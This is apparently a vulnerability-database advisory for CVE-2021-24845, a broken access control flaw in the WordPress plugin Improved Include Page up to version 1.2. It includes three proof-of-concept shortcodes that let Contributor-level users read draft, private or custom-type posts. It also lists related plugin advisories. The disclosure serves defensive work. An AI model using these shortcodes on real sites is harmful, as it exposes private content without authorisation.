Improved Include Page <= 1.2 – Contributor+ Arbitrary Posts/Pages Access | CVE 2021-24845 | Plugin Vulnerabilities

Description

The plugin allows passing shortcode attributes with post_type & post_status which can be used to retrieve arbitrary content. This way, users with a role as low as Contributor can gain access to content they are not supposed to.

Proof of Concept

[include-page allowtype="post" allowstatus="draft" id="131"]
[include-page allowtype="post" allowstatus="private" id="132"]

[include-page allowtype="custon-post-type" allowstatus="any" id="{ID}"]

Affects Plugins

improved-include-page

No known fix

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Francesco Carlucci

Submitter

Francesco Carlucci

Submitter website

https://carluc.ci

Submitter twitter

Verified

Yes

WPVDB ID

ab857454-7c7c-454d-9c7f-1db767961e5f

Timeline

Publicly Published

2021-11-15 (about 2 years ago)

Added

2021-11-15 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2021-10-24

Title

Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update

Published

2021-10-29

Title

Smash Balloon Social Post Feed < 4.0.1 - Subscriber+ Arbitrary Plugin Settings Update to Stored XSS

Published

2023-10-16

Title

Awesome Support < 6.1.5 - Insufficient permission check in wpas_edit_reply

Published

2021-10-20

Title

Sassy Social Share 3.3.23 - Missing Access Controls to PHP Object Injection

Published

2021-10-05

Title

Simple Download Monitor < 3.9.6 - Unauthorised Log Reset